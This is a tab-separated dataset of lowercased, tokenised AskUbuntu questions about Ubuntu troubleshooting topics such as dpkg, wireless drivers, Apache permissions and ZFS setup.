404285	revert dpkg interrupted operation without installation	my question is little bit different . i was installing xdg package . after downloading the required packages dpkg was installing java-8-installer . and i found that java-8-installer start to download java..tar.gz file . but my bandwidth was limited or any other reason i close the operation using ctl+c . dpkg operation is interrupted . i know dpkg -- configure -a will resume the installation . now i decide that i should not install xdg ( actually do n't want to download java8 ) . i want to remove xdg . how can i do that ? sudo apt-get -f autoremove xdg above command return dpkg error ( need dpkg -- configure -a ) . dpkg -- configure -a will install java-8-installer and going to download java8 . is there any solution ?
404287	how can i resize 300 image at the same time ?	i have a folder , which include ~300 images . i want to resize it to 800px wide in another folder . how can i do that ? i have tried some imagemagick command .
404291	see byobu screens using connectbot	i use connectbot sometimes to connect to my ubuntu machine , and that works fine , however it just comes up with a standard shell , not my byobu screens that i get when i connect to it using another machine running ssh , such as my windows machine running putty . is there any way that i can see my byobu screens from connectbot ?
404295	when i upgraded to ubuntu 13.10 , i ca n't connect to wireless . the only thing i can connect to is ethernet , so please help me , what should i do ?	here is the output of the lspci -nnk | grep -i net -a2 03:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 05 ) subsystem : lenovo device [ 17aa:3975 ] kernel driver in use : r8169 04:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11bgn wireless network adapter [ 14e4:4727 ] ( rev 01 ) subsystem : broadcom corporation device [ 14e4:0587 ] kernel driver in use : wl here is the output of the iwconfig eth0 no wireless extensions . eth1 ieee 802.11abg essid : '' balaji '' mode : managed frequency:2.412 ghz access point : 64:66 : b3 : c7 : fc:30 retry long limit:7 rts thr : off fragment thr : off power management : on lo no wireless extensions .
404296	skype video upside down ld_preload	i got this error when i tried to load skype with v4lcompat.so to solve my upside down problem . error : ld.so : object '/usr/lib/x86_64-linux-gnu/libv4l/v4l1compat.so ' from ld_preload can not be preloaded : ignored . can anyone help ?
404298	ubuntu 13.10 apache keeps giving this error while accessing website	i have just installed ubuntu 13.10 . i followed this guide ( most of it ) to setup lamp . then i was getting this error about could not reliably determine the server 's fully qualified domain name which i solved by adding a line servername localhost to the httpd.conf file . after that i installed phpmyadmin using sudo apt-get install phpmyadmin everything was working fine ( i.e . phpmyadmin , mysql etc ) after that i copied one of my projects to /var/www/ and when i try to access this i keep getting this error : you do n't have permission to access /afaqtraders on this server . i have tried chmod -r o+w /var/www to provide it the required ( read write ) permissions but i am still having this error and unable to get rid of it . can any one please tell me what am i missing here . i am new to ubuntu and do n't know much about it , so apologize if any of this seems noob to you . p.s . i have tried almost all of the questions here at askubuntu but was n't able to get this to work . below is how my /etc/apache2/apache.conf file looks : < directory / > options followsymlinks allowoverride none require all denied < /directory > < directory /usr/share > options indexes followsymlinks allowoverride none require all granted < /directory > < directory /var/www/ > options indexes followsymlinks allowoverride all require all granted < /directory > < directory /* > options indexes followsymlinks allowoverride none require all granted < /directory >
404300	change multiple file names in sub directories in single line	i have a directory named backup . backup contains several subdirectories named monday , tuesday , wednesday ... each subfolder contains file named filename.txt i want to change all names filename.txt to someothername.txt . how can i do that in one line in bash ?
404312	how to connect mblaze ultra 3g plus in ubuntu 13.10	how to connect mblaze ultra 3g plus in ubuntu 13.10 . os is not showing the installation path from the dongle also . is there any additional softwares for installation ?
404315	run script on boot without login to occypy screen	hi i 'm running a automated server and when it starts it is waiting for login on tty1 . is there a way to show a script , let 's say a `` date '' on screen ? i 've tried to put this into /etc/init/hud.conf watch -- interval 0.2 -- precise -- color -- exec date but nothing happens .
404320	ca n't change shell in ec2 server	i am trying to change the default shell on ubuntu server 13.10 on amazon 's aws ( ami ami-ad184ac4 ) . i 've tried : ~ $ chsh -s /bin/zsh but got : password : chsh : pam : authentication failure i 've tried obvious passwords ( e.g . ubuntu ) but always got the same error message - chsh : pam : authentication failure . any idea why ca n't i change the default shell ?
404325	using disk image files ( .iso ) as a repository	i am currently using lubuntu 13.10 and i have made an iso file with aptoncd to backup the programs ( with their dependencies of course ) that i may need when i reinstall lubuntu . my problem is that i am using a netbook and thus i have no cd or dvd reader . thats why i can not burn the iso file to a cd or dvd and plug it in to use it as a repository . is there a way to use the iso file directly as a repository ? i know that this question has already been answered in how to use a .iso image as a cd-rom repository ? however when i run sudo apt-cdrom -d=/aptoncd-mountpoint add as posted in the answer of the former question i get using cd-rom mount point /cdrom/ unmounting cd-rom waiting for disc ... please insert a disc in the drive and press enter mounting cd-rom ... e : failed to mount the cdrom . e : no cd-rom could be auto-detected or found using the default mount point . i strongly believe that i have not done anything wrong . so what i wanted to ask is : how can i fix this if possible ? and how can i use an iso file as a repository if i am not able to do the steps presented in the answer of how to use a .iso image as a cd-rom repository ? thanks in advence
404331	purpose of `` postrotate invoke-rc.d rsyslog rotate '' when logrotating , and is this command outdated ?	when using logrotate to keep log files rotating , i have seen postrotate invoke-rc.d rsyslog rotate > /dev/null endscript i know postrotate makes bash execute the following command after the log file is rotated , but what is the purpose of this command being executed exactly ? finally , is it now outdated ? ( i seem to seeing a message from anacron saying `` the script you are attempting to invoke has been converted to an upstart job , but rotate is not supported for upstart jobs . '' )
404333	how to add / list / remove a group	how can i add a new group ( for file permission ) ? how can i view the full list of existing groups ? how can i remove a group ? i prefer to do the above using a ui rather than terminal commands if possible . i am using ubuntu 12.04 lts on virtualbox .
404337	how to easily switch between proxy methods from terminal	how do i switch between the proxy methods ( none , manual , automatic ) and apply it system wide from terminal ?
404341	where can i find a complete reference for the $ ps1 variable ?	the default ps1 variable on my machine ( kubuntu 13.10 ) is this : \ [ \e ] 0 ; \u @ \h : \w\a\ ] $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\ $ i 'm looking for a reference for how the $ ps1 variable works that , at a minimum , allows me to understand the above ps1 variable .
404345	what speech service does orca screen reader use ?	what speech service does orca screen reader use ? is there any api to access it from an application ? like : function talk ( text ) { /* convert text to speech */ } ... or maybe via bash commands ? talk `` hello world '' being a sofware developer i am interested in this .
404347	lightdm is not starting	i get a blank screen on boot : ( $ sudo tail /var/log/lightdm/lightdm.log [ +0.02s ] debug : using d-bus name org.freedesktop.displaymanager [ +0.02s ] debug : registered seat module xlocal [ +0.02s ] debug : registered seat module xremote [ +0.02s ] debug : registered seat module unity [ +0.02s ] debug : registered seat module surfaceflinger [ +0.02s ] debug : adding default seat [ +0.02s ] debug : seat : starting [ +0.02s ] debug : seat : creating greeter session [ +0.03s ] debug : seat : failed to find session configuration unity-gretter [ +0.03s ] debug : seat : failed to create greeter session here is the conf $ cat /etc/lightdm/lightdm.conf [ seatdefaults ] allow-guest=true autologin-guest=false autologin-user= greeter-session=unity-gretter user-session=ubuntu [ vncserver ] enabled=false [ xdmcpserver ] enabled=false here is boot log tail /var/log/boot.log * restoring resolver state ... [ ok ] not starting x display manager ( xdm ) ; it is not the default display manager . * stopping system v runlevel compatibility [ ok ] * starting [ ok ] * starting [ ok ] * stopping [ ok ] * starting recovery options if display manager fails to start [ ok ] * starting mount network filesystems [ ok ] * stopping mount network filesystems [ ok ] * stopping read required files in advance [ ok ]
404351	apparmor does n't start with ubuntu 13.10 64bit	installed with apt-get install apparmor apt-get install apparmor-utils apparmor-profiles apparmor-notify but even after a reboot aa-status tells me apparmor module is not loaded . /etc/init.d/apparmor start has no output also changed grub options security=apparmor apparmor=1 also sudo service apparmor restart sudo /etc/init.d/apparmor restart yields no output edit : found that /sys/kernel/security is empty.however , trying to do sudo mount -t securityfs securityfs /sys/kernel/security yields : mount : according to mtab , securityfs already mounted on /sys/kernel/security there is another similar problem unanswered apparmor do n't start with 12.04 lts 64bit edit2 : sudo dmesg | grep -i apparmor command line : boot_image=/boot/bzimage-3.10.9-xxxx-grs-ipv6-64-vps root=/dev/sda1 ro security=apparmor apparmor=1 kernel command line : boot_image=/boot/bzimage-3.10.9-xxxx-grs-ipv6-64-vps root=/dev/sda1 ro security=apparmor apparmor=1
404357	wireless option missing in network settings	when i go to click on network in the system settings menu , i have is network proxy and wired network but no wireless option . my laptop is hp pavilion g6 . i have a fresh install of ubuntu 12.04
404359	convert all letters to uppercase in all text files from a directory	i have a lot of text files ( with .txt extension ) in one directory in which i want to convert all letters to uppercase . how can i do this using the terminal ? i 've tried : sed -i 's/ [ a-z ] / [ a-z ] /g ' *.txt but without success ...
404361	extending my root paritition	i 've win8/ubuntu dual boot . i already have 4 partition so i can not create a new partition and mount it elsewhere . so , this ( how can i increase a partition 's size ? ) question did not help . here 's a screen shot of my gparted ( run on ubuntu live ) how can i extend /dev/sda6 so that i can make use of unallocated space ? ( w/o failing my current grub )
404362	what onscreen keyboard is this ? trying to disable	i accidentally enabled this annoying keyboard and i 'm desperately trying to uninstall or disbale it . any help will be greatly appreciated . yes , it is not onboard . thanks !
404368	how do i install skype on ubuntu 13.04 ? - solution found ?	i am getting the following error message from the ubuntu software centre when trying to install skype for linux on my ubuntu 13.04 64 but system : requires installation of untrusted package : gcc-4.7-base : i386 libavahi-client3 : i386 libavahi-common-data : i386 libavahi-common3 : i386 libcomerr2 : i386 libcups2 : i386 libexpat1 : i386 libffi6 : i386 libfontconfig1 : i386 libfreetype6 : i386 libgcc1 : i386 libglib2.0-0 : i386 libgpg-error0 : i386 libgssapi-krb5-2 : i386 libgstreamer-plugins-base0.10-0 : i386 libgstreamer0.10-0 : i386 libice6 : i386 libjbig0 : i386 libjpeg8 : i386 libk5crypto3 : i386 libkeyutils1 : i386 libkrb5-3 : i386 libkrb5support0 : i386 liblcms1 : i386 libllvm3.2 : i386 liblzma5 : i386 libmng1 : i386 liborc-0.4-0 : i386 libp11-kit0 : i386 libpciaccess0 : i386 libpcre3 : i386 libpng12-0 : i386 libqtwebkit4 : i386 libselinux1 : i386 libsm6 : i386 libsqlite3-0 : i386 libstdc++6 : i386 libtasn1-3 : i386 libtxc-dxtn-s2tc0 : i386 libuuid1 : i386 libxau6 : i386 libxdamage1 : i386 libxdmcp6 : i386 libxslt1.1 : i386 libxss1 : i386 zlib1g : i386 can anybody help ? dear all - many thanks for your rapid responses . the answer provided by qasim did the trick . probably the other solutions were good too , but i may not have pressed the right buttons when trying them ; copy-pasting qasim 's commands into the terminal worked like a miracle - i had stuff scrolling down the screen for about 5 minutes but then skype installed and i have already had my first conversation . long live the askubuntu community . cheers
404372	13.10 indicator-sound only preferred-media-players	my ubuntu 13.10 ignores my settings for my media players : altough the dconf-editor settings are such , that there 's only one preferred-media-player ( 'vlc.desktop ' ) my indicator-sound shows gmusicbrowser , spotify and vlc ( which are supposed to be `` only '' interested-media-players as preferred-media-players the screenshot explains my problem ... why ? and how can i change this ? i have no idea why this happens
404373	having problems installing ubuntu side by side with mac	i have followed the instructions to the letter.and i am computer literate lol.but it seems mac does not want me to do this ! i did install refit , set a partition for ubuntu.downloaded and burned the 12.04 version but it gets to select which cd mode 1 or 2.then my keyboard locks up.should i try the 13 version ? .my mac is an older model 2008.i have tried using ubuntu , xubuntu and mandriva .
404376	usb install black screen and flashing underscore	i have just installed ubuntu onto my newly made pc and it went through the noramal installation process then it asked to restart and now it is just a blank screen with a white flashing line or underscore . i can not press any button on the keyboard it just makes the beep noise for every time i press a key . can anyone help me ?
404378	ubuntu one- do i lose data when the system having the files crashes ?	i have set up ubuntu one to synchronize my folder in my documents with my other devices . so i can access my folder with documents on my other laptop . but what happens if my computer where this folder is at crashes ? when i remove a file in my documents folder , i see that it also is removed on my other device . but is it safe to sync my documents folder this way or do i lose everything when my 'good ' computers crashes ? do i lose everything when the computers crashes where to documents are ? thanks
404379	can not connect to internet using d-link mobile broadband modem for bsnl network	i am using dlink modem of model dwm-156 as an hsupa usb adapter with a bsnl network sim in it . i am using ubuntu 12.04 alongside with windows7 . i have defined the network settings in the mobile broadband category . i can connect to the internet on windows7 but while using ubuntu i can not connect to internet . upon typing lsusb in the terminal , i found that the dlink device is detected by ubuntu . also i am not provided with any cd for installation of drivers and the modem has no .deb files in it . and most importantly ubuntu is not detecting the memory card inside the card reader of my modem . what should i do to get myself connected to the internet ?
404384	laptop temperature too high	i have a fresh install of ubuntu 12.04 , my laptop temperature is too high 78 . output of lspci 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 2 ( rev c4 ) 00:1c.2 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 3 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm76 express chipset lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] thames [ radeon hd 7500m/7600m series ] 07:00.0 network controller : ralink corp. rt3290 wireless 802.11n 1t/1r pcie 07:00.1 bluetooth : ralink corp. rt3290 bluetooth 08:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) 09:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5229 pci express card reader ( rev 01 ) how to make the temperature low ? when i run the following command sudo lshw -c display i get this *-display description : vga compatible controller product : thames [ radeon hd 7500m/7600m series ] vendor : hynix semiconductor ( hyundai electronics ) physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list rom configuration : driver=radeon latency=0 resources : irq:48 memory:40000000-4fffffff memory:62000000-6201ffff ioport:4000 ( size=256 ) memory:62020000-6203ffff *-display description : vga compatible controller product : 3rd gen core processor graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:46 memory:63000000-633fffff memory:50000000-5fffffff ioport:5000 ( size=64 ) can someone please help with this , what should be done so that temperature remain around 50 , should some graphics be disabled ?
404395	deleting windows 8 and clean install ubuntu on ssd/hdd hybrid	i hope this is n't a duplicate but all the question asked what to keep windows 8 . i want to completely remove windows and install ubuntu . using this ultra book . ( the asus vivobook s400ca-rsi5t18 14-inch touchscreen ultrabook ) question one : can i just do a plain install ubuntu over windows option or will i need to install it manually ? in order to install the / on the ssd and the home on the hdd question two : will i need the swap partition ? question three : what version would be best for me 12.04 lts or ( 13.10 then when it comes out 14.04 ) will constantly be checking for answers . thank in advance
404397	how do i move the terminal in geany ?	is there any way we can move the terminal from the bottom to the sidebar ? we work in ror and the terminal is used quite often , so having them side by side would be helpful .
404400	problem with amd hd8670m + fglrx driver in ubuntu 13.10	i just installed ubuntu 13.10 ( amd64 ) in my hp pavilion 15-e044tx with amd hd8670m graphic card . after the first boot , error message was displayed `` the system is running in low-graphics mode '' . so i entered to shell pressing ctrl + alt + f1 , and then i entered this command below to solve this problem : sudo apt-get install fglrx after reboot , login screen was displayed correctly , but after log in to my user , displayed just a black screen and cursor . i tried to find a solution much time , but there is no answer to solve my problems .
404409	how to track temperature changes using sensors ?	i have ubuntu 13.10 with sensors installed . everything works fine , but i 'm wondering if i can somehow keep track of temperature changes . nothing fancy - max and min would do . it would be even better if i could have a chart with temperature of each core recorded , but not necessary . any thoughts ? maybe using command line tool and making a script that would execute sensors command every 1 second and then store the output into a file ? sounds a bit bulky , but if nothing better is available , i guess it would do the job .
404416	how to split the disk partition having ubuntu ?	i want to create partition of my hard disk but the partition contains ubuntu installed in it . i have gparted installed but since the partition contains ubuntu i ca n't unmount . is there any way i can create partition without losing the files that i have and with ubuntu still lying there ?
404424	restore .bashrc to its default ?	i 've been trying to install android developer tools on eclipse , and i followed the information in this video : http : //www.youtube.com/watch ? v=-qk9c-ug2ui & list=plqoohan5nxx43fqfugu6diwsqnbvxdgi5 . like the video said , i added the following two lines of code to the .bashrc file export path= $ ( path ) : -/android-sdk/tools/ export path= $ ( path ) : -/android-sdk/platform-tools/ it seems , however , that this did not help me to install the android files on eclipse , as i am still having problems with that . what 's more , it seems that i ca n't make any command in the terminal without getting a major error now ! every time i try to make a command in the terminal i get the following message : the command could not be located because '/usr/bin ' is not included in the path environment variable . is there away to restore .bashrc to its default ?
404427	my system is refusing the new kernel version !	my ubuntu 64 bit system is refusing to see the new kernel version i downloaded , from the system update , it 's file is located within the /boot directory but will not go to it ! i have the grub application and it see 's the new kernel version , but it fails to load up it 's own boot screen . when i start up my system i get the gnu grub version 1.9-21ubuntu3.14 and boot 's me to ubuntu kernel version 3.2.0-57-generic ! i do n't understand why i get the old boot screen appearing ! the grub customizer settings loads with grub 2 version ! i really like grub customizer program , compared to the gnu grub version 1.9ubuntu3.14 default boot loader by ubuntu ! my question is how to fix this problem and boot 's directly to the grub customizer boot program !
404431	how to calibrate an interactive whiteboard	after plugging an interactive whiteboard ( panasonic ub-t580 ) i 've surprisingly found it was working in some way . everything done in the whiteboard was reproduced in the computer display but without calibration , more than 30 cm away . how can i get working properly ? i 'm using 12.04 lts - kernel 3.11 . thanks in advance .
404436	how do i uninstall real player on ubuntu 12.04	i installed real player right from their website with a debian package sent to my download file that was opened up through the software center . i decided to uninstall it . and deleted the debian file.and destroyed the trash . it did not work ! there was no record of it at the software centre ; hence , nothing there to uninstall.i went to the console and used a wide variety of methods recommended on ubuntu forums.. one response said that i could not uninstall it because it was `` virtual '' ! huh ? ? ? where i come from , if you ca n't uninstall something easily , we call it malware . can you help , please.thanks
404440	what is jigdo and how is it done ?	i happen to see that it is possible to update the ubuntu image in daily basis . but i do n't have the faintest idea on how it is done . please explain the limits and possibilities in using jigdo in simple terms .
404442	skype indicator still showing after removing sni-qt	i 'm using skype-wrapper to get skype into indicator-messages . but the default skype tray icon is still showing up - even after uninstalling sni-qt . and yes , i 've relogged ... ( service lightdm restart ) how do i get rid of the skype indicator for good ? ( thunderbird also ... )
404443	home microserver using ubuntu and zfs : about zfs	i see this topic is quite a popular ( [ 1 ] , [ 2 ] ) so hopefully i can get nice feedback on what i 'm trying to do . i 'm buying an hp microserver with 4x 2tb , and i currently have two computers . i 'd like this microserver to become my `` databank '' in many respects : i want to configure my computers so they can automatically backup to this box using the ubuntu utility ( deja-dup ) . i want to install a git server , a local dropbox and a media server ( from what i know , either plex , xbmc or this post , or any good suggestion ) ideally , and because of the little i know about it , i 'd like my filesystem to be zfs and i also need help for configuring my zpool in the most efficient way . about zfs i want my filesystem to be fast in reading , very reliable and to support a single disk crash , but i do n't require it to be fast in writing . there are four disks , all 2tb - 7200rpm - 64mb cache . i want to make the most of them , in that respect for instance , plain mirroring does n't seem to be the way to go . but i have no previous experience with zfs , hence my request for help . i 'm thinking of installing ubuntu server 12.04 as my operating system , and use ubuntu-zfs . how should i configure my zpool to make the most of my four 2tb hdds ? many many thanks in advance , j
404444	home microserver using ubuntu : about the mediaserver	i see this optic is quite popular ( [ 1 ] , [ 2 ] ) so i 'm hopeful to get nice feedback on what i 'm trying to do . i 'm buying an hp microserver with 4x 2tb , and i currently have two computers . i 'd like this microserver to become my `` databank '' in many respects : i want to configure my computers so they can automatically backup to this box using the ubuntu utility ( deja-dup ) . i want to install a git server , a local dropbox and a media server ( from what i know , either plex , xbmc or this post , or any good suggestion ) ideally , and because of the little i know about it , i 'd like my filesystem to be zfs and i also need help for configuring my zpool in the most efficient way . about the media server i realize this is a matter of opinion , but i 'd like to make this question as unopiniated as possible : as of today , which is the media server that best combines the following features in order : mature/stable , reliable , easy to configure , supports audio/video/photo , comes with a lightweight client , requires few resources itself ? many many thanks in advance , j
404445	is ubuntu touch available for ipod touch , iphone , ipad ?	has any one had any success booting ubuntu touch os on a ipod touch , iphone , or ipad ? i see that there has been other linux os to be loaded . other possible resource : http : //www.idroidproject.org/ http : //www.youtube.com/watch ? v=wz4u1q7x59m
404446	home microserver using ubuntu : backup with deja-dup	i see this topic is quite popular ( [ 1 ] , [ 2 ] ) so i 'm hopeful to get nice feedback on what i 'm trying to do . i 'm buying an hp microserver with 4x 2tb , and i currently have two computers . i 'd like this microserver to become my `` databank '' in many respects : i want to configure my computers so they can automatically backup to this box using the ubuntu utility ( deja-dup ) . i want to install a git server , a local dropbox and a media server ( from what i know , either plex , xbmc or this post , or any good suggestion ) ideally , and because of the little i know about it , i 'd like my filesystem to be zfs and i also need help for configuring my zpool in the most efficient way . backup with deja-dup what do i have to do so that my computers automatically backup ( using deja-dup ) on my microserver every day ? many many thanks in advance , j
404447	netflix composting support	i receive this message when trying to open netflix desktop . compositing is not available , please enable compositing support and relaunch netflix desktop . how do i enable compositing support for netflix ?
404449	lne100tx network card problems on ubuntu 12.10	i 've got an old dell optiplex with an integrated broadcom network device that i 've been using for a while . i 'm trying to add a second network card , a linksys lne100tx , on eth1 and i ca n't get it to work . here 's my /etc/udev/rules.d/70-persistent-net.rules : # pci device 0x14e4 : /sys/devices/pci0000:00/0000:00:1c.4/0000:03:00.0 ( tg3 ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' 00:19 : b9:13 : d1 : b7 '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' # pci device 0x11ad : /sys/devices/pci0000:00/0000:00:1e.0/0000:04:00.0 ( tulip ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' 00 : a0 : cc:33:53:04 '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth1 '' and ifconfig -a : eth0 link encap : ethernet hwaddr 00:19 : b9:13 : d1 : b7 inet addr:138.87.178.40 bcast:138.87.178.255 mask:255.255.255.0 inet6 addr : fe80 : :219 : b9ff : fe13 : d1b7/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:12871 errors:0 dropped:0 overruns:0 frame:0 tx packets:8378 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:7258267 ( 7.2 mb ) tx bytes:1426340 ( 1.4 mb ) interrupt:16 eth1 link encap : ethernet hwaddr 00 : a0 : cc:33:53:04 inet6 addr : fe80 : :2a0 : ccff : fe33:5304/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:12 dropped:0 overruns:0 frame:0 tx packets:0 errors:24 dropped:0 overruns:0 carrier:24 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:794 errors:0 dropped:0 overruns:0 frame:0 tx packets:794 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:84950 ( 84.9 kb ) tx bytes:84950 ( 84.9 kb ) however , sudo ifup eth1 gives me `` ignoring unknown interface eth1=eth1 . '' lights on the card start flashing when i connect it to a router , but network-manager does n't seem to notice . if i tell network-manager to connect to eth1 , it sits and tried for about a minute and then eventually gives up . does this look like a driver problem ? a simple system misconfiguration somewhere ? i 'm stumped .
404451	broadcom 4331 card stop works with `` radio hardware status changed to disabled ''	at startup , wireless card works perfectly , but after some time , it stops work and starts work again only after reboot : dmesg : [ 225.648978 ] b43-phy0 : radio hardware status changed to disabled [ 225.649010 ] b43-phy0 error : mac not suspended [ 225.649109 ] wlan0 : deauthenticating from 84 : c9 : b2:07:93 : a8 by local choice ( reason=3 ) [ 225.649596 ] b43-phy0 error : mac not suspended [ 227.255612 ] b43-phy0 error : forcing rf sequence timeout [ 227.267584 ] b43-phy0 : radio turned on by software [ 227.267587 ] b43-phy0 : the hardware rf-kill button still turns the radio physically off . press the button to turn it on . [ 227.367502 ] b43-phy0 error : dma rx reset timed out [ 227.527383 ] b43-phy0 error : dma tx reset timed out [ 227.687248 ] b43-phy0 error : dma tx reset timed out [ 227.847111 ] b43-phy0 error : dma tx reset timed out [ 228.006986 ] b43-phy0 error : dma tx reset timed out [ 228.166850 ] b43-phy0 error : dma tx reset timed out [ 228.166860 ] b43-phy0 error : mac not suspended [ 228.166956 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 228.166975 ] cfg80211 : calling crda to update world regulatory domain [ 228.175928 ] cfg80211 : world regulatory domain updated : [ 228.175937 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 228.175944 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 228.175949 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 228.175953 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 228.175957 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 228.175961 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm macbook ~ $ sudo dmidecode -s system-product-name macbookpro8,2 macbook ~ $ lspci -nn|grep 4331 03:00.0 network controller [ 0280 ] : broadcom corporation bcm4331 802.11a/b/g/n [ 14e4:4331 ] ( rev 02 ) macbook ~ $ lsmod|grep b43 b43 356429 0 mac80211 517444 1 b43 cfg80211 401762 2 b43 , mac80211 ssb 51596 1 b43 bcma 40966 1 b43 macbook ~ $ modinfo b43 filename : /lib/modules/3.11.0-15-generic/kernel/drivers/net/wireless/b43/b43.ko firmware : b43/ucode9.fw firmware : b43/ucode5.fw firmware : b43/ucode16_mimo.fw firmware : b43/ucode15.fw firmware : b43/ucode14.fw firmware : b43/ucode13.fw firmware : b43/ucode11.fw immediately after reboot : macbook ~ $ rfkill list all 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no after connection drop : macbook ~ $ rfkill list all 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : yes obviously , i did n't push any hardware wifi buttons , because my macbook do n't have it . i also try to use broadcom sta ( bcmwl-kernel-source ) , but it have the same problem , with other messages in dmesg . any ideas ?
404453	my lenovo camera does not seem to work since i loaded ubuntu	i am new to ubuntu and have a problem with my camera when using skype . since loading ubuntu 12.04 my lenovo y510 camera does not work . the picture is upside down . can anyone help me . i have looked for new drivers but can not find anything .
404458	configure volume max range to be about 150 % or find good beats audio driver ?	my laptop , hp envy spectre xt , unfortunately has beats audio . as far as i understand , there is n't a straightforward driver for beats audio for linux . the best thing one can do is use hda-jack-retask . although i have had success with it , i ca n't figure out the proper pin configuration which makes all my audio components work . for example , i can choose a configuration which makes the laptop speakers louder , but the microphone does n't work then . my question : is there a way to set the audio max volume to be at about 150 % ? right now , i manually set it above 100 % when i listen to music or watch a movie , but i would like to be able to control the volume above 100 % with keyboard shortcuts ( which do not let you go above 100 % ) . see screenshot about what i mean by adjusting it above 100 % manually . http : //i.imgur.com/uffijpg.png
404460	networking restart hangs the terminal	i have a ubuntu virtualbox image on windows 7 host . when my computer goes to sleep , the network is lost both in host and the image . after reconnecting host , i need to reconnect the guest . i ran ( blog-venv ) vagrant @ precise64 : /vagrant/selenium/mysite $ sudo /etc/init.d/networking restart * running /etc/init.d/networking restart is deprecated because it may not enable again some interfaces * reconfiguring network interfaces ... and it hangs the terminal . i can not kill it either . i read the the following is a better command , but it is also stuck ( blog-venv ) vagrant @ precise64 : /vagrant/selenium/mysite $ sudo service network-manager restart i tried killing the processes , but i am unable to . the kill command also hangs ! ( blog-venv ) vagrant @ precise64 : /vagrant/selenium/mysite $ ps -ef | grep networking root 2757 761 0 09:51 pts/1 00:00:00 sudo /etc/init.d/networking restart root 2758 2757 0 09:51 pts/1 00:00:00 /bin/sh -e /etc/init.d/networking restart vagrant 3147 2825 0 10:10 pts/0 00:00:00 grep -- color=auto networking ( blog-venv ) vagrant @ precise64 : /vagrant/selenium/mysite $ sudo kill -9 761 i will restart now . how do i reconnect to wireless in the guest image without rebooting ? i do n't have a ui way of doing it . i have installed xfce4 . is there a ui network manager you can suggest ? thank you .
404461	using ls and cd comands on network folders	super-new linux/terminal user here- is it possible to use ls and cd comands directly on directories within a public folder on a nas , or does the share need to me mounted within the root directory structure first ? if so , how would the path look ?
